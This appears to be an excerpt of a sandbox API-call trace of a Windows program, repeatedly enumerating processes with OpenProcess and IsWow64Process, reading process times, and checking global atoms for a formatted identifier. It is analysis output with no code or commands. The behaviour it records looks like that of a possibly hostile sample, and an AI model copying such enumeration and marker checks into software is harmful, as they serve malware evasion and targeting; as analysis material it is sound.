	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.390] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.390] CloseHandle (hObject=0x20c) returned 1
	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.390] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.390] CloseHandle (hObject=0x20c) returned 1
	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.390] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.390] CloseHandle (hObject=0x20c) returned 1
	[0089.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.391] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.391] CloseHandle (hObject=0x20c) returned 1
	[0089.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.391] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.391] CloseHandle (hObject=0x20c) returned 1
	[0089.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.391] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.391] CloseHandle (hObject=0x20c) returned 1
	[0089.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.391] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.391] CloseHandle (hObject=0x20c) returned 1
	[0089.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.391] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.392] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.392] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.392] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.392] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.392] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.392] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.393] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.393] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.394] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.394] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.394] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.394] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.394] CloseHandle (hObject=0x20c) returned 1
	[0089.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.395] CloseHandle (hObject=0x20c) returned 1
	[0089.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.395] CloseHandle (hObject=0x20c) returned 1
	[0089.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.395] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.395] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.395] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.395] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.396] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.396] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.396] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.396] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.397] CloseHandle (hObject=0x20c) returned 1
	[0089.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.397] CloseHandle (hObject=0x20c) returned 1
	[0089.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.486] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.486] CloseHandle (hObject=0x20c) returned 1
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.487] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.487] CloseHandle (hObject=0x20c) returned 1
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.487] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.487] CloseHandle (hObject=0x20c) returned 1
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.487] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.487] CloseHandle (hObject=0x20c) returned 1
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.487] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.487] CloseHandle (hObject=0x20c) returned 1
	[0089.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.487] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.487] CloseHandle (hObject=0x20c) returned 1
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.488] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.488] CloseHandle (hObject=0x20c) returned 1
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.488] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.488] CloseHandle (hObject=0x20c) returned 1
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.488] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.488] CloseHandle (hObject=0x20c) returned 1
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.488] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.488] CloseHandle (hObject=0x20c) returned 1
	[0089.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.488] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.488] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.489] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.489] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.489] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.489] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.489] CloseHandle (hObject=0x20c) returned 1
	[0089.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0089.489] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0089.490] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0089.490] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0089.490] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0089.490] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0089.490] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.490] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.491] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.491] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.491] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.491] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.491] CloseHandle (hObject=0x20c) returned 1
	[0089.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0089.491] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.492] CloseHandle (hObject=0x20c) returned 1
	[0089.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0089.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.492] CloseHandle (hObject=0x20c) returned 1
	[0089.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0089.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.492] CloseHandle (hObject=0x20c) returned 1
	[0089.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.492] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.492] CloseHandle (hObject=0x20c) returned 1
	[0089.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0089.493] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.495] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0089.495] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0089.499] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0089.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.500] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0089.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0089.500] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0089.500] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0089.500] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0089.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0089.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0089.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0089.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0089.501] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.501] CloseHandle (hObject=0x20c) returned 1
	[0089.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0089.501] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.501] CloseHandle (hObject=0x20c) returned 1
	[0089.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0089.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0089.575] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0089.576] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.576] CloseHandle (hObject=0x20c) returned 1
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0089.576] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.576] CloseHandle (hObject=0x20c) returned 1
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0089.576] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0089.576] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0089.577] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0089.577] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0089.577] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0089.577] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0089.577] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.577] CloseHandle (hObject=0x20c) returned 1
	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0089.578] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.578] CloseHandle (hObject=0x20c) returned 1
	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0089.578] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.578] CloseHandle (hObject=0x20c) returned 1
	[0089.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0089.578] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0089.578] CloseHandle (hObject=0x20c) returned 1
